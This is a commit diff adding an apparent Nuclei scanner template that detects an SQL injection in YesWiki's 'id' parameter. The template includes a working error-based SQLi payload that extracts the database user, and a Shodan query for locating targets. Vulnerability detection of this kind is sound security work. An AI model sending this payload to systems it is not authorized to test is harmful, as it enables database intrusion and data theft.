commit
60406e102f
|
@ -0,0 +1,33 @@
|
|||
id: yeswiki-sql
|
||||
|
||||
info:
|
||||
name: YesWiki - SQL Injection
|
||||
author: arafatansari
|
||||
severity: critical
|
||||
description: |
|
||||
YesWiki before 2022-07-07 allows SQL Injection via the "id" parameter in the AccueiL URL.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/32e27955-376a-48fe-9984-87dd77e24985/
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.html:"yeswiki"
|
||||
tags: yeswiki,sqli
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?PagePrincipale/rss&id=1%27+and+extractvalue(0x0a,concat(0x0a,(select+concat_ws(0x207c20,md5({{num}}),1,user()))))--+-'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'c8c605999f3d8352d7bb792cf3f'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue